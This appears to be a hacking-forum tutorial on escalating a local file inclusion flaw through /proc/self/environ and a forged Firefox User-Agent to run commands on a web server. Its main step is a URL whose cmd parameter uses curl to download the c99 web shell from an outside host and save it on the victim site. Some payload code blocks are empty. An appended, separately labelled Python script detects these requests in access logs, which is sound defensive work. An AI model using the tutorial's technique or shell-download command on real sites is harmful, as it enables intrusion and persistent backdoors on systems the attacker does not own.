Required:
1. A site vulnerable to LFI
2. PHP knowledge
3. The Mozilla Firefox browser...
================================
So... first you find some site vulnerable to LFI... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ
If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs :D
Now, on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our user agent (Mozilla, Netscape, etc.) and now we must spoof it... but how?
Open a new tab in Mozilla, and type "about:config" (without quotes)...
Now, in "Filter" type: general.useragent.extra.firefox
You will get something like this:
Code:
Preference name                   Status    Type     Value
general.useragent.extra.firefox   default   string   Firefox/3.0.7
Now, double-click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with
Code:
If everything is good you will get the shell included... Otherwise, you will get errors... Mostly I was getting the error "URL-File access disabled" or something like that... but using PHP I found another way...
Instead of typing
Code:
as the user agent, type this:
Code:
Then load your vuln page like this:
Code:
http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php
So, let's review... basically, you are just adding the &cmd= thing at the end of the URL...
Now, using the "curl" command you will get the content of the shell in txt format, and by using -o c99.php you will rename it to c99.php...
Now simply go to your site like this:
Code:
http://yourvulnsite.com/c99.php
And that's all for now... cheers!
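Seen from the server side, the requests described in this post leave two signals in a web access log: a request target that resolves to /proc/self/environ, and a User-Agent header carrying a PHP open tag. The following is an added example, not part of the original post, that flags both in combined-format log lines; the function names, sample lines, IP addresses and the placeholder User-Agent are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: request line, status, size, referer, user agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>.*)"$'
)
PROC_RE = re.compile(r'/proc/(self|\d+)/environ', re.I)
PHP_TAG_RE = re.compile(r'<\?(php|=|\s)', re.I)


def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding so encoded paths are matched after decoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line):
    """Return the set of findings for one access-log line (empty set = clean)."""
    m = LINE_RE.match(line)
    if not m:
        return {"unparsed"}
    findings = set()
    if PROC_RE.search(fully_unquote(m.group("target"))):
        findings.add("lfi-proc-environ")
    if PHP_TAG_RE.search(fully_unquote(m.group("ua"))):
        findings.add("php-in-user-agent")
    return findings


# Constructed sample lines (documentation IP range, placeholder User-Agent content).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0 Firefox/3.0.7"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /vulnscript.php?page=../../../proc/self/environ HTTP/1.1" 200 2048 "-" "Mozilla/5.0 Firefox/3.0.7"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /vulnscript.php?page=..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2048 "-" "Mozilla/5.0 <?php /* placeholder */ ?>"',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(sorted(classify(entry)) or "clean", "|", entry[:60])
```

A hit on either signal that was answered with status 200 points at the script and include parameter named in the request line as the place to review first.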